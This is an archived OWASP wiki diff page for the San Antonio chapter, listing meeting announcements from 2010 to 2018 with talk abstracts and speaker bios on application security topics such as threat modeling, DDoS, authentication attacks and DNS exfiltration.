This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "San Antonio"

(107 intermediate revisions by 8 users not shown)
Line 1: Line 1:
'''San Antonio OWASP Chapter: Wed August 18, 2010'''
+
{{Chapter Template|chaptername=San Antonio|extra=The chapter leadership team is:
  
Topic: Which Web Programming Languages are Most Secure?
+
[mailto:[email protected] Dan Cornell]
 +
[mailto:[email protected] Matt Valdes]  [mailto:[email protected] Michael Xin]
  
Presenter: Jeremiah Grossman, Founder and CTO, WhiteHat Security
+
|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-sanantonio|emailarchives=http://lists.owasp.org/pipermail/owasp-sanantonio}}
  
Date: Wednesday, August 18, 2010 11:30am – 1:00pm
+
== Local News  ==
 +
Please see https://www.meetup.com/OWASP-San-Antonio/ for the most up to date chapter meeting schedule
  
Location:
+
=== '''OWASP San Antonio - November 9, 2018 @ 11:30am''' ===
San Antonio Technology Center (Web Room)
+
Join us for the November 2018 OWASP San Antonio meeting!
3463 Magic Drive
 
San Antonio, TX 78229
 
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229
 
  
 +
We will have an interesting talk covering strategies and benefits of application tracing!
  
Abstract:
+
'''Title:'''
Security-conscious organizations make implementing a software security development lifecycle a priority. As part of the process, they evaluate a large number of development technologies for building websites. The assumption by many is that not all development environments are created equal. So the question often asked is, “What is the most secure programming language or development framework available?”
+
 
 +
Tracing your system for fun and profit
 +
 
 +
'''Abstract:'''
 +
 
 +
How many of us go in every day knowing the ins and outs of our application but not fully understanding how interacts within the greater system flow? How often do we get called up at night from a frantic developer three dependencies away from our application yelling about a response that they did not expect due to a bug fix we put in a few weeks earlier? As developers, that happens more often than we care to admit. Having something that shows an entire system workflow is monumental. On top of that, security professionals would also benefit from understanding how different parts of the system interact with each other.
 +
 
 +
There have been many ways to solve this problem (design documents, architecture designs, workflow system documents, etc.) but most uses require manual updates and dedicated resources that know the entire system flow to understand what to update. This is not (usually) scalable.
 +
 
 +
Tracing cross-boundary systems looks to help solve these issues. In this talk, we’ll talk about one way of tracing a system end-to-end (OpenTracing) and will talk about benefits to security professionals, look at implementation details, talk about other competing products in this space, and next steps in the ecosystem. The goal for this talk is for the attendees to leave with a rudimentary understanding of system tracing and potential benefits and drawbacks
 +
 
 +
'''Speaker:''' Dimitry Ushakov
 +
 
 +
'''Bio:'''
 +
 
 +
Dimitry Ushakov is a Quality Engineer at Rackspace. When not dealing with impostor syndrome from working with geniuses every day, he works on making operators' and developers' lives easier with test automation, continuous integration/delivery management, and other testing industry buzzwords.
 +
 
 +
'''Location:''' Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232
 +
 
 +
==='''OWASP San Antonio - October 5, 2018 @ 11:30am''' ===
 +
Join us for the October 2018 OWASP San Antonio meeting where we will have a talk covering the latest in DDoS attack tools and services!
 +
 
 +
'''Title:'''
 +
 
 +
Weapons of Mass Disruption
 +
 
 +
'''Abstract:'''
 +
 
 +
We now live in a world where individuals or groups of individuals hold the same destructive power that only nation states once held. For as little as a couple of dollars an hour, fortune 500 companies and even nation states have been wiped off the Internet. The emergence of professional DDoS services is changing the threat landscape of the Internet once again. We'll take a look at DDoS tools and services and what we can do to combat them.
 +
 
 +
'''Speaker:''' Roman Lara
 +
 
 +
'''Bio:'''
 +
 
 +
Roman Lara is a Senior Engineer on Rackspace’s specialized DDoS Team and has been a Racker in various roles since 2009. He is responsible for driving the design, build, and maintenance of Rackspace's DDoS Mitigation infrastructure and services. Roman is a high-energy, hands-on leader who’s knowledge and experience of threat trends help develop and create powerful mitigation strategies through Fanatical Support. He earned a degree in Business from the University of Texas in San Antonio.
 +
 
 +
'''Location:''' Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232
 +
 
 +
The slide link: https://www.slideshare.net/michaelxin2015/weapons-of-mass-disruption-by-roman-lara-for-owasp-san-antonio-chapter-meetup
 +
 
 +
==='''OWASP San Antonio - June 29, 2018 @ 11:30am''' ===
 +
Join us for the June 2018 OWASP San Antonio meeting where we will have a talk covering how to evaluate threats to IoT devices and their related systems!
 +
 
 +
'''Title:'''
 +
 
 +
Threat Modeling for IoT Systems
 +
 
 +
'''Abstract:'''
  
 +
The Internet of Things (IoT) is an exciting and emerging area of technology allowing individuals and businesses to make radical changes to how they live their lives and conduct commerce. The challenge with this trend is that IoT devices are just computers with sensors running applications. Because IoT devices interact with our personal lives the proliferation of these devices exposes an unprecedented amount of personal sensitive data to significant risk. In addition, IoT security is not only about the code running on the device. These IoT devices are connected to systems that include supporting web services as well as other client applications that allow for management and reporting.
  
Clearly, familiarity with a specific product, whether it is designed to be secure-by-default or must be configured properly, and whether various libraries are available, can drastically impact the outcome. Still, conventional wisdom suggests that most popular modern languages / frameworks (commercial & open source) perform relatively similarly when it comes to an overall security posture. At least in theory, none is markedly or noticeably more secure than another. Suggesting PHP, Java, C# and others are any more secure than other frameworks is sure to spark heated debate.
+
A critical step to understanding the security of any system is building a threat model. This helps to enumerate the components of the system as well as the paths that data takes as it flows through the system. Combining this information with an understanding of trust boundaries helps provide system designers with critical information to mitigate systemic risks to the technology and architecture. This presentation looks at how Threat Modeling can be applied to IoT systems to help build more security systems during the design process, as well as how to use Threat Modeling when testing the security of IoT systems.
  
 +
'''Speaker:''' Dan Cornell
  
As has been said in the past, “In theory, there is no difference between theory and practice. But, in practice, there is.” Until now, no website security study has provided empirical research measuring how various Web programming languages / frameworks actively perform in the field. To which classes of attack are they most prone, how often and for how long; and, how do they fare against popular alternatives? Is it really true that popular modern languages / frameworks yield similar results in production websites?
+
'''Bio:'''
  
 +
A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As the Chief Technology Officer and a Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process. He is also the original creator of ThreadFix, Denim Group's industry leading application vulnerability management platform.
  
By analyzing the vulnerability assessment results of nearly 1,700 websites under WhiteHat Sentinel management, we may begin to answer some of these questions. These answers may enable the website security community to ask better and deeper questions, which will eventually lead to more secure websites. Organizations deploying these technologies can have a closer look at particularly risk-prone areas; software vendors may focus on areas found lacking; and, developers will increase their familiarity with the strength and weaknesses of their technology stack. All of this is vitally important because security must be baked into development frameworks and be virtually transparent. Only then will application security progress be made.
+
'''Location:''' Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232
  
 +
=== '''OWASP San Antonio - March 30, 2018 @ 11:30am''' ===
 +
Join us for the March 2018 OWASP San Antonio meeting!
  
Presenter Bio:
+
We will have a talk covering methods and techniques used when attacking authentication in web apps.
Jeremiah Grossman founded WhiteHat Security in August 2001.
 
  
 +
'''Title:'''
  
A world-renowned expert in Web security, Mr. Grossman is a founder of the Web Application Security Consortium (WASC), and was named to InfoWorld's Top 25 CTOs for 2007.
+
Attacking Authentication in Web Applications Abstract:
  
 +
Broken authentication is an ongoing issue, identified in the OWASP Top 10 2013 and 2017 (A2 in both). While broken authentication can span multiple topics, this presentation focuses mainly on attacking single factor authentication using usernames and passwords. Methods and techniques will be discussed to perform reconnaissance, username enumeration, account lockout bypass, and various password attacks against web applications. Speaker: Jake Miller
  
Mr. Grossman is a frequent speaker at industry events including the Black Hat Briefings, RSA Conference, ISACA, CSI, InfoSec World, OWASP, ISSA, and Defcon as well as a number of large universities. He has authored dozens of articles and white papers, is credited with the discovery of many cutting-edge attack and defensive techniques and is a co-author of XSS Attacks: Cross Site Scripting Exploits and Defense.
+
'''Bio:'''
  
 +
Jake is a penetration tester for Blue Canopy (Jacobs Engineering Group), primarily focusing on web application security. Prior to penetration testing, he was a Security Controls Assessor, a SOC analyst, and a Navy Submariner. He blogs about security on <nowiki>https://laconicwolf.com</nowiki>, writes a fair amount of Python and PowerShell code on <nowiki>https://github.com/laconicwolf</nowiki>, and occasionally tweets (@laconicwolf). Aside from security and coding, he enjoys spending time with his family and participating in ultra-running and obstacle races.
  
Mr. Grossman is frequently quoted in major media outlets such as USA Today, the Washington Post, The Financial Times, InformationWeek, InfoWorld, USA Today, PC World, Dark Reading, SC Magazine, CNET, CSO and NBC news. He frequently alerts the media community to the latest attacks and is not only able to offer in-depth commentary, but also provide his perspective of what’s to come.
+
'''Location:''' Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232
  
 +
=== '''OWASP San Antonio - February 23, 2018 @ 11:30am''' ===
 +
Join us for the February 2018 OWASP San Antonio meeting!
  
Mr. Grossman was named a “friend of Google” and is also an influential blogger (www.jeremiahgrossman.blogspot.com) who offers insight and encourages open dialogue regarding current research and vulnerability trend information.
+
We will have a talk covering the complexities of secrets management and how one enterprise met the challenge​.
  
 +
'''Title''': Hashicorp Vault in the Enterprise​
  
Prior to WhiteHat, Mr. Grossman was an information security officer at Yahoo! responsible for performing security reviews on the company's hundreds of websites. Before Yahoo!, Mr. Grossman worked for Amgen, Inc.
+
'''Abstract''':
  
 +
As established enterprises move to embrace automation, securing the secrets that are required for applications to run presents challenges. How can automation be introduced to legacy application deployment models? What capabilities are needed to support modern application architectures? This presentation will review some of the discoveries made while researching these challenges from an enterprise perspective and describe at a high level how HashiCorp Vault can be a way to address them.
  
Sodas and snacks will be provided.  Feel free to bring a brown-bag lunch.
+
'''Speaker''': Mike Thurmond
  
Please RSVP: E-mail [email protected]  or call (210) 572-4400.
+
'''Bio''':
  
 +
Mike Thurmond is an Information Security Architect at H-E-B. Mike has 15+ years of experience developing, deploying and managing security tools and practices in large enterprises. His experience includes developing and managing authentication systems, developing customized security services, developing and running compliance programs, and integrating security into an agile development SDLC.
  
 +
'''Location:''' Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232
  
{{Chapter Template|chaptername=San Antonio|extra=The chapter leader is [mailto:[email protected] Dan Cornell]
+
=== '''OWASP San Antonio - January 26, 2018 @ 11:30am''' ===
<paypal>San Antonio</paypal>
+
Join us for the January 2018 OWASP San Antonio meeting! 
|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-sanantonio|emailarchives=http://lists.owasp.org/pipermail/owasp-sanantonio}}
 
  
== Local News ==
+
We will have a great talk about heap-related attacks and prevention methods​.
'''San Antonio OWASP Chapter: Fri. August 13, 2010'''
 
  
Topic: 1)How OWASP Works and Guided Tour of OWASP Projects / 2) Using the O2 Platform to Consume OWASP projects
+
Speaker: Tongping Liu
  
Presenter: Dinis Cruz
+
Bio:
  
Date: Friday, August 13, 2010, 2010 11:30am – 1:00pm
+
Tongping Liu is an Assistant Professor at the University of Texas at San Antonio. He got his Ph.D. from the University of Massachusetts Amherst in 2014. His research spans runtime systems, operating systems, programming languages, compiler, and distributed systems. His primary research goal is to practically improve the performance, reliability and security of parallel software. His work appeared in most prestigious system conferences, such as SOSP, OSDI, EuroSys, and CCS. He has been awarded 2015 Google Faculty Research Award and Mozilla Research Grant.
  
Location:
+
Title:
San Antonio Technology Center (Web Room)
 
3463 Magic Drive
 
San Antonio, TX 78229
 
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229
 
  
 +
​FreeGuard: A Faster Secure Heap Allocator​
  
 
Abstract:
 
Abstract:
1) How OWASP Works and Guided Tour of OWASP Projects - This presentation will focus on my experience in getting things done at OWASP, what resources are available and what types of initiatives should the local chapters be doing. In addition to a quick overview of a number of key OWASP projects, this talk will also provide a tutorial on how the OWASP WIKI (MediaWiki based) can be used as a database (using the MediaWiki templates technology)
 
  
2) Using the O2 Platform to Consume OWASP projects - This presentation will focus on how to consume the OWASP Wiki and a number of OWASP projects using the OWASP O2 Platform. The O2 Platform has powerful technology and capabilities for both BlackBox and WhiteBox analysis and this presentation will provide examples on how to use O2 with: WebGoat, WebScarab, Code Crawler, Dir Buster,  Testing Guide, Code Review Guide and OpenSAMM
+
In spite of years of improvements to software security, heap-related attacks still remain a severe threat. One reason is that many existing memory allocators fall short in a variety of aspects. For instance, performance-oriented allocators are designed with very limited countermeasures against attacks, but secure allocators generally suffer from significant performance overhead, e.g., running up to 10x slower.
  
The O2 Platform is focused on automating application security knowledge and workflows. It is specifically designed for developers and security consultants to be able to perform quick, effective and thorough 'source-code-driven' application security reviews (BlackBox + WhiteBox). In addition to the manual findings created/discovered by security consultants, the OWASP O2 Platform allows the easy consumption of results from multiple OWASP  projects and commercial scanning tools. This allows security consultants to find, exploit and automate (via Unit Tests) security vulnerabilities usually dismissed by the community as impossible to find/recreate. More importantly, it provides the Security Consultants a mechanism to: a) 'talk' with developers (via UnitTest) , b) give developers a way to replicate + "check if it's fixed" the vulnerabilities reported and c) engage on a two-way conversion on the best way to fix/remediate those vulnerabilities.
+
This ​talk will introduce FreeGuard, a secure memory allocator that prevents or reduces a wide range of heap-related security attacks, such as heap overflows, heap over-reads, use-after-frees, as well as double and invalid frees. FreeGuard has similar performance to the default Linux allocator, with less than 2% overhead on average, but provides significant improvement to security guarantees.
  
 +
@Denim Group Offices
 +
1354 N Loop 1604 E Suite 110
 +
San Antonio, TX 78232
  
Presenter Bio:
+
=== '''OWASP San Antonio - November 17, 2017 @ 11:30am''' ===
Dinis Cruz is a Security Consultant based in London (UK) and specialized in: ASP.NET/J2EE Application Security, Application Security audits and .NET Security Curriculum Development.
+
Join us for the November 2017 OWASP San Antonio meeting! 
For the past years Dinis has focused on the field of Static Source Code analysis, from May 2007 to Dec 2009 he worked as a independent consultant for Ounce Labs (bought by IBM in July 2009) where during active security engagements using Ounce's technology he developed the Open Source codebase which now is the foundation of the OWASP O2 Platform.
 
Dinis is currently focused on making the O2 Platform the industry standard for consuming, instrumenting and data-sharing between the multiple WebAppSec tools, the Security consultants and the final developers.
 
Dinis is a also active trainer on .Net security having written and delivered courses for IOActive, Foundstone, Intense School and KPMG (at multiple locations including BlackHat), and has delivered a number of presentations and keynote speeches at multiple OWASP and Security related conferences
 
At OWASP, Dinis is the leader of the OWASP O2 Platform project, member of the OWASP Global Projects Committee, chair of the OWASP Connections Committee and member of the OWASP  
 
  
 +
We will have a great talk about optimizing AppSec programs with instrumentation and sensors.
  
Sodas and snacks will be provided.  Feel free to bring a brown-bag lunch.
+
Speaker: Girish Nair
  
 +
Bio:
 +
Girish Nair has been a software developer for more than two decades. He has special interest in web related technologies and application security. He has a Master’s degree in computer science, and is a CISSP. He currently works for Contrast Security, where he evangelizes their technology.
  
Please RSVP: E-mail [email protected]  or call (210) 572-4400.
+
Title:  
 +
Using Instrumentation and Sensors to drive Optimization in your Application Security Program
  
 +
Abstract:
 +
In our physical world, we have instrumentation all around us. Clocks tell us time, kitchen ovens tell us temperature, cars tell us speed and fuel level, and even have onboard health diagnostics. At our homes, we have security alerts when someone trespasses our property or opens a door. However, in the world of software, we have very little visibility into what is going on inside the software. Our presenters will describe how instrumentation can be used to enable your software applications to both detect vulnerabilities and block attacks.  Furthermore, they will demonstrate the insights offered by using instrumentation and why this approach can offer unique insights to your security program.
  
 +
@Denim Group Offices 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232
  
'''San Antonio OWASP Chapter: Wed July 21, 2010'''
+
=== '''OWASP San Antonio - October 27, 2017 @ 11:30am''' ===
  
Topic: A Caching Technique (PHP Implementation)
+
=== Join us for the October 2017 OWASP San Antonio meeting! ===
 +
We will have a talk about DNS Exfiltration Techniques and Methods.
  
Presenter: Dan Ross, VP Engineering, PIC Business Systems
+
Speaker: Nolan Berry
  
Date: Wednesday July 19, 2010 11:30am – 1:00pm
+
Bio:  
 +
Nolan has been working at Rackspace for close to 5 years focusing on linux and has a strong passion for security. He is on the DNS Engineering team and has spoken at various conferences and places about DNS exfiltration and botnet control structures.
  
Location:
+
Title:  
San Antonio Technology Center (Web Room)
+
DNS Exfiltration Techniques and Methods
3463 Magic Drive
 
San Antonio, TX 78229
 
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229
 
  
 +
Abstract:
 +
This presentation will show various methods of DNS exfiltration to move data out of networks and into networks with varying levels of detectability and talk about why DNS presents a monitoring and security issue to modern systems engineers looking to secure their infrastructure. We will discuss how to detect, but also how to execute this from a red team.
  
Abstract:
+
@Denim Group
Reduce 304's and improve web application performance.  A caching technique is demonstrated using PHP. Easy implementation as well as caching override are discussed.
+
1354 N Loop 1604 E Suite 110
 +
San Antonio, TX 78232
 +
 
 +
=== '''OWASP San Antonio - September 29, 2017 @ 11:30am''' ===
 +
Join us for the September 2017 OWASP San Antonio meeting!  
  
 +
We will have a talk about how billion dollar enterprises manage application security at scale.
  
Presenter Bio:
+
Speaker: Brandon Triance-Haldane
Dan Ross has been VP Engineering for over 20 years at PIC Business Systems, which provides integrated business software for the several industries. He has led the design, development, and maintenance of many commercial web applications and programs. He has a BS in Industrial Engineering from St. Mary's University in San Antonio.
 
  
Sodas and snacks will be provided. Feel free to bring a brown-bag lunch.
+
Bio:
 +
Brandon Triance-Haldane is a Solution Architect at Security Compass; he has been delivering high quality solutions to his clients for more than six years. Brandon holds a bachelor's degree in English literature as well as an advanced diploma in Computer Security & Investigations. In his spare time, Brandon likes making music, writing code, and following the Toronto Blue Jays.
  
Please RSVP: E-mail [email protected]  or call (210) 572-4400.
+
Title:  
 +
How Billion Dollar Enterprises Manage Application Security at Scale
  
 +
Abstract:
 +
Security Compass recently completed a comprehensive research study by surveying companies across multiple industries with the goal of discovering how large, complex organizations address application security at scale.  The majority of respondents surveyed were multinational organizations who reported annual earnings greater than $1 billion USD.  Through this new research study, we have gleamed novel insights on how large organizations manage application security at scale.  Through this presentation, we will reveal aggregated insights, industry trends, and best practices that illuminate how organizations are addressing application security at scale, so that you may apply and compare these learnings to the state of application security at your own organization.
  
 +
@Denim Group Offices
 +
1354 N Loop 1604 E Suite 110
 +
San Antonio, TX 78232
  
'''San Antonio OWASP Chapter: Wed June 16, 2010'''
 
  
Topic: Securing Software Applications Using Dynamic Dataflow Analysis
+
'''OWASP San Antonio - August 25, 2017 @ 11:30am'''
  
Presenter: Steve Cook, Senior Research Analyst, SwRI
+
Join us for the August 2017 OWASP San Antonio meeting! 
  
Date: Wednesday June 16, 2010 11:30am – 1:00pm
+
@Denim Group Offices
 +
1354 N Loop 1604 E Suite 110
 +
San Antonio, TX 78232
  
Location:
+
We will have a talk about Serverless Security!
San Antonio Technology Center (Web Room)
 
3463 Magic Drive
 
San Antonio, TX 78229
 
  
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229
+
Speaker: Geva Solomonovich, COO Snyk
  
 +
Title:
 +
Serverless Security: What’s Left To Protect?
  
 
Abstract:
 
Abstract:
In this presentation, we present an ongoing research effort that ensures that a wide variety of user-defined security policies are enforced on executing C programs while keeping runtime overhead low and with little disruption to the development process by leveraging Dynamic Dataflow Analysis (DDFA).  The DDFA system is built upon the Broadway static data flow analysis and error checking system, which is a source-to-source translator for C developed by the computer sciences department at the University of Texas at Austin (UT-Austin). UT-Austin and the Southwest Research Institute (SwRI) recently collaborated to further enhance the system through a government research project funded by Intelligence Advanced Research Projects Activity (IARPA) and a SwRI internal research project.
+
Serverless means handing off server management to the cloud platforms – along with their security risks. With the “pros” ensuring our servers are patched, what’s left for application owners to protect? As it turns out, quite a lot. This talk discusses the aspects of security serverless doesn’t solve, the problems it could make worse, and the tools and practices you can use to keep yourself safe.
 +
 
 +
 
 +
'''OWASP San Antonio - July 21, 2017 @ 11:30am'''
 +
 
 +
Join us for the July 2017 OWASP San Antonio meeting!  
  
The system works by automatically instrumenting the original source, guided by the security policy, with DDFA runtime library calls.  The modified program is then compiled for the platform of choice so that its security policy can be enforced at runtime through the DDFA runtime library.
+
@Denim Group Offices
 +
1354 N Loop 1604 E Suite 110
 +
San Antonio, TX 78232
  
The runtime overhead is kept low by leveraging the semantic information provided by the security policy and a sophisticated dependence analysis to enable optimizations beyond standard compiler techniques.  This results in a program that is instrumented with additional code only where provably necessary, so innocuous flows of data are not tracked at runtime.
+
We will have a talk comparing the internet to the US Interstate System, and what this means to the future of information security.
  
Disruption to the development process is minimized through the security policy specification.  The security policy is defined once by a security expert using a simple language, which has a direct mapping to the application programming interface to which the program is written. The policy, once defined, can be applied to many different programs. The DDFA approach is easily integrated into the development workflow, adding only an additional compilation step before application deployment.
+
Speaker: Damon Small
  
The system does not require any modification to the original source code by the programmer, and does not require hardware or operating system changes. In the future, our system can be extended to handle multiple languages and complement new security solutions.
+
Bio:
 +
Damon Small began his career studying music at Louisiana State University. Pursuing the changing job market, he took advantage of computer skills learned in the LSU recording studio to become a systems administrator in the mid-1990s. Over the past 16 years as a security professional he has supported InfoSec initiatives in the healthcare, defense, aerospace, and oil and gas industries. In addition to his Bachelor of Arts in Music, Damon completed the Master of Science in Information Assurance degree from Norwich University in 2005. His role as Technical Director includes working closely with NCC Group consultants and clients in delivering complex security assessments that meet varied business requirements.
  
Presenter Bio:
+
Title:
Steve Cook is a senior research analyst in the System Security and High Reliability Software section at the SwRI. His background and expertise are in distributed and parallel computing, compilers, as well as object-oriented and generic programming. He received his master’s degree in computer science from Texas A&M University. While at Texas A&M, he worked as a research assistant for Dr. Bjarne Stroustrup, creator of the C++ Programming Language, where he helped develop a new approach to writing concurrent programs that allows programmers to quickly turn a sequential C++ program into a parallel one that is race and deadlock free.
+
Connections: Eisenhower and the Internet
  
 +
Abstract :
 +
The speaker researches the history of one large, government-funded infrastructure and compares it to another. Specifically, the Eisenhower Interstate System and the Internet. "Connections: Eisenhower and the Internet" explores what the logistical challenges of moving vehicles across the Country can teach us about cybersecurity. Although these two topics seem unrelated, the speaker will take the audience on a journey that begins with early 20th century road-building projects, travels through ARPANET and the commercialization of the Internet, and arrives at current-day cyberspace. These two massive infrastructures have changed the world, and there are important lessons that the former can teach about the latter. The presentation concludes with predictions about the future of the Information Superhighway and how information security professionals can prepare.
  
Sodas and snacks will be provided.  Feel free to bring a brown-bag lunch.
 
  
Please RSVP: E-mail owasprsvp@denimgroup.com  or call (210) 572-4400.
'''OWASP San Antonio - June 30, 2017 @ 11:30am'''

Join us for the June 2017 OWASP San Antonio meeting!

@Denim Group Offices
1354 N Loop 1604 E Suite 110
San Antonio, TX 78232

We will have a talk about testing infrastructure code.

Speaker: Dimitry Ushakov

Bio:
Dimitry Ushakov is a Quality Engineer at Rackspace. When not dealing with impostor syndrome from working with geniuses every day, he works on making operators' and developers' lives easier with test automation, continuous integration/delivery management, and other testing industry buzzwords.

Title:
Testing Infrastructure Code

Abstract:
Whether you subscribe to TDD or like to write all your tests after all the development's complete, we can all agree that testing application code is a great idea. While we do a very good job of validating that our application works, we rarely give as much love to our infrastructure code. Infrastructure testing allows us to validate that the hardware, software dependencies, and system configurations will work when deploying to a target environment without an actual need for deployment (most of the time).

In this talk, we'll define what we mean by infrastructure as code and infrastructure testing. We'll use the ecosystem of one of the major players in this area, Chef, to take a look at the tooling available to properly unit test, statically analyze, integration test, and compliance/security test our infrastructure.

In the second part of the talk, we'll work through a demo application, applying that tooling to build a true CI/CD pipeline.

'''OWASP San Antonio - May 26, 2017 @ 11:30am'''

Join us for the May 2017 OWASP San Antonio meeting!

Denim Group
1354 N Loop 1604 E Suite 110
San Antonio, TX 78232

We will have a talk about adding security to your software procurement process.

Speaker: Kevin Dunn

Bio:
Kevin Dunn is Senior Vice President for Consultancy for NCC Group. Kevin has been a professional security consultant for over 15 years, working on diverse projects and challenging technologies for the world's largest and most demanding companies. His current responsibilities include delivering security consultancy while managing a talented, highly technical team of pentesters. Kevin works closely with Fortune 100 companies, covering the Oil & Gas, Finance and Software sectors, developing strategic security assessment and advisory services for NCC Group brands from his office base of operations in Austin, TX. Over his career, he has worked on many physical penetration tests, site audits, and design or implementation projects for physical security.

Title:
It Was Broken When It Got Here! Security in your Software Procurement Process

Abstract:
In 2017, software security is reasonably well understood. Thanks to the hard work of organizations like MITRE, OWASP, BSIMM, Microsoft, OpenSAMM and others, we have moved to a much better software security landscape when compared to 10+ years ago. Of course vulnerabilities still exist, and are found with regularity, but these are typically addressed quickly and competently by the big software vendors. For example, a new critical vulnerability in Windows will be fixed by Microsoft and patched efficiently in most enterprises in a matter of days to weeks. Most recently, Google managed to fix an OAuth vuln being exploited in a mass-phishing exercise in a matter of hours! But what about everything else you install in your company or use as a service? Not all product vendors have the same level of understanding or approach to security, and not all software is under the constant scrutiny of an operating system or widespread authentication mechanism.

As organizations, we buy and install lots of third-party software, ranging from desktop applications through to entire platforms or appliances. Who is checking that this software is free of simple vulnerabilities? This issue of security for Commercial Off-The-Shelf (COTS) software, or Free and Open Source Software (FOSS), is often a complicated one. In this talk, we'll look at some case studies of vulnerabilities found during penetration tests that were then used to forge compromises of companies. In each case, the flaws discovered and exploited had been within the products for a significant amount of time, providing a potential backdoor into the company's internal network or data.

The session will culminate in advice and guidance on how to ensure that security is not an afterthought when purchasing new enterprise products for your company.

'''San Antonio OWASP Chapter: Wed May 19th, 2010'''

Topic: The Open Software Assurance Maturity Model

Presenter: Dan Cornell, Principal, Denim Group

Date: Wednesday May 19th, 2010 11:30am – 1:00pm

Location:
San Antonio Technology Center (Web Room)
3463 Magic Drive
San Antonio, TX 78229
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229

Abstract:
The Open Software Assurance Maturity Model (SAMM) (http://www.opensamm.org/) is a flexible and prescriptive framework for building security into a software development organization. Covering more than typical SDLC-based models for security, SAMM enables organizations to self-assess their security assurance program and then use recommended roadmaps to improve in a way that's aligned to the specific risks facing the organization. Beyond that, SAMM enables creation of scorecards for an organization's effectiveness at secure software development throughout the typical governance, development, and deployment business functions. Scorecards also enable management within an organization to demonstrate quantitative improvements through iterations of building a security assurance program.

This workshop will introduce the SAMM framework and walk through useful activities such as assessing an assurance program, mapping an existing organization to a recommended roadmap, and iteratively building an assurance program. Time allowing, additional case studies will also be discussed. OpenSAMM is an open and free project and has recently been donated to the Open Web Application Security Project (OWASP) Foundation. For more information on OpenSAMM, visit http://www.opensamm.org/.

Presenter Bio:
Dan Cornell has over ten years of experience architecting, developing and securing web-based software systems. As a Principal of Denim Group, he leads the organization's technology team, overseeing methodology development and project execution for Denim Group's customers. He also heads the Denim Group application security research team, investigating the application of secure coding and development techniques to the improvement of web-based software development methodologies. He is also the primary author of sprajax, Denim Group's open source tool for assessing the security of AJAX-enabled web applications.

Sodas and snacks will be provided. Feel free to bring a brown-bag lunch.

Please RSVP: E-mail owasprsvp@denimgroup.com or call (210) 572-4400.

'''OWASP San Antonio - January 27, 2017 @ 11:30am'''

Denim Group
1354 N Loop 1604 E Ste 110, San Antonio, TX

Join us for the January 2017 OWASP San Antonio meeting!

We will have a talk about integrating security into DevOps pipelines through the use of attack surface monitoring.

Speaker: Dan Cornell

Bio: A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As the Chief Technology Officer and a Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process. He is also the original creator of ThreadFix, Denim Group's industry-leading application vulnerability management platform.

Title: Monitoring Application Attack Surface to Integrate Security into DevOps Pipelines

Abstract: A web application's attack surface is the combination of URLs it will respond to as well as the inputs to those URLs that can change the behavior of the application. Understanding an application's attack surface is critical to being able to provide sufficient security test coverage, and by watching an application's attack surface change over time, security and development teams can help target and optimize testing activities.

This presentation looks at methods of calculating web application attack surface and tracking the evolution of attack surface over time. In addition, it looks at metrics and thresholds that can be used to craft policies for integrating different testing activities into Continuous Integration / Continuous Delivery (CI/CD) pipelines for teams integrating security into their DevOps practices.

https://www.meetup.com/OWASP-San-Antonio/events/236883708/

'''San Antonio OWASP Chapter: Wed March 17, 2010'''

Topic: Protecting Your Applications: How to Secure Business Critical Applications from Time Bombs, Backdoors & Data Exfiltration

Presenter: Clint Pollock

Date: Wednesday, March 17th, 2010 11:30am – 1:00pm

Location: San Antonio Technology Center (Web Room)
3463 Magic Drive
San Antonio, TX 78229
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229

Sponsored by: VERACODE

Abstract:
With the increasing practice of outsourcing and using 3rd party libraries, it is nearly impossible for an enterprise to identify the pedigree and security of the software running its business critical applications. As a result, backdoors and malicious code are increasingly becoming the prevalent attack vector used by hackers.

Whether you manage internal development activities, work with third party developers or are developing a COTS application for the enterprise, your mandate is clear: safeguard your code and make application security a priority for internal and external development teams.

In this session we will cover:

* Prevalence of backdoors and malicious code in third party attacks
* Definitions and classifications of backdoors and their impact on your applications
* Methods to identify, track and remediate these vulnerabilities

Presenter Bio:
Clint Pollock is a Senior Solutions Architect at Veracode. Since 1997, he has also created security solutions for large-scale enterprise environments on behalf of CREDANT Technologies and Netegrity. In his current role, Clint helps globally distributed organizations evaluate, track, and mitigate their online business risk. Clint's greatest strengths are his enthusiasm, experience and determination to help customers succeed in maintaining secure, compliant systems and avoid the consequences and bad headlines that come with application security breaches. Clint resides in Chicago, IL.

FREE PIZZA will be provided, courtesy of our friends from Veracode.

Please RSVP: E-mail owasprsvp@denimgroup.com or call (210) 572-4400.

'''OWASP San Antonio - August 26, 2016 @ 11:30am'''

Denim Group
1354 N Loop 1604 E Ste 110, San Antonio, TX

Join us for the June OWASP San Antonio meeting!

We will have a talk about Automated DNS Data Exfiltration and Mitigation.

Speakers: Nolan Berry, Towne Besel, Cory Schwartz

Bios: Nolan Berry is a Linux Systems Engineer on the Network Operations DNS Infrastructure team at Rackspace.

Towne Besel is a Security Engineer on the Network Operations DDoS Team at Rackspace.

Cory Schwartz is a Linux Operations Engineer on the Rackspace Cloud Storage Team.

Title: Automated DNS Data Exfiltration and Mitigation

